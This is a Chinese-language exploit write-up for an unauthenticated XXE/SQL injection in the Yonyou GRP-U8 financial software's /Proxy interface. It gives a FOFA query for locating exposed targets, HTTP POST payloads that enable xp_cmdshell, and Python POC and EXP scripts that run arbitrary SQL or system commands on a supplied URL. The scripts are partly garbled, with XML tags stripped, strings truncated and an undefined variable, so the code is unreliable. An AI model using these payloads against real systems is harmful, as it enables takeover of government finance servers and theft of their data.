用友 GRP-U8 Proxy XXE-SQL注入漏洞
文章目录
- 声明
- 一、漏洞详情
- 二、漏洞描述
- 三、利用条件
- 四、漏洞POC
- 五、利用脚本
- 六、漏洞代码分析
声明
本篇文章仅限技术学习与安全研究,切勿将文中所涉及的攻击手段用于非授权下渗透行为,造成任何后果与本文和作者无关。
一、漏洞详情
用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
二、漏洞描述
该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。
用友 GRP-U8 Proxy 接口存在 SQL 注入漏洞,攻击者通过漏洞可以获取服务器权限。
FOFA:title=“GRP-U8” 或 title=“用友 GRP-U8 行政事业内控管理软件”
三、利用条件
无需登录
四、漏洞POC
POST /Proxy HTTP/1.1
Accept: *
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
Host: {{Hostname}}
Content-type: application/x-www-form-urlencoded
Content-Length: 349
Connection: close
//查询数据库版本(MSSQL),并回显
cVer=9.8.0&dp=<
DATAFORMAT>XML AS_DataRequest ProviderName DataSetProviderData
Data select @@version<
/PARAM>
//查询当前数据库名称
cVer=9.8.0&dp=<
DATAFORMAT>XML AS_DataRequest ProviderName DataSetProviderData
Data select db_name()<
/PARAM>
以POST方式发送如下几个Payload,开启 xp_cmdshell 操作,查询到当前数据库名称后,第一个包需要修改当前库名
cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequest ProviderName DataSetProviderDataData use master
cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequest ProviderName DataSetProviderDataData exec sp_configure 'show adv
anced options',1
cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequest ProviderName DataSetProviderDataData reconfigure<
/PARAMS>
cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequest ProviderName DataSetProviderDataData exec sp_configure 'xp_cmdsh
ell',1
cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequest ProviderName DataSetProviderDataData reconfigure<
/PARAMS>
//执行dir命令
cVer=9.8.0&dp=<
DATAFORMAT>XMLAS_DataRequest ProviderName DataSetProviderDataData exec xp_cmdshell "dir"
上面几个POC大概意思就是开启xp_cmdshell指令并刷新配置
USE master
EXEC sp_configure ‘show advanced options’,1 //启用xp_cmdshell的高级配置 RECONFIGURE --刷新配置
RECONFIGURE //先执行一次刷新,处理上次的配置
EXEC sp_configure ‘xp_cmdshell’,1 //打开xp_cmdshell,可以调用SQL系统 之外的命令
RECONFIGURE //刷新配置
五、利用脚本
GRP-U8_SQLinjection_POC
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
print "Usage: python poc.py url sql"
sys.exit(1)
url = sys.argv[1]
sql = sys.argv[2]
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
}
def poc(url,sql):
url = url + '/Proxy'
print url
data = 'cVer=9.8.0&dp=XML AS_DataRequest ProviderName DataSetProviderDataData '+sql+'|
GRP-U8_SQLinjection_EXP
#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
print "Usage: python exp.py url cmd"
sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded",
}
def exp(url,cmd):
url = url+ '/Proxy'
print url
data = 'cVer=9.8.0&dp=XML AS_DataRequest ProviderName DataSetProviderDataData exec xp_cmdshell \''+cmd+'\'|
'
ROW = re.findall(result_row,res,re.S | re.M)
print '命令执行成功!'
for i in range(len(ROW)):
print ROW[i]
if __name__ == "__main__":
exp(sys.argv[1],sys.argv[2])
六、漏洞代码分析
可参考文章:https://baijiahao.baidu.com/s?id=1681131145841849209&wfr=spider&for=pc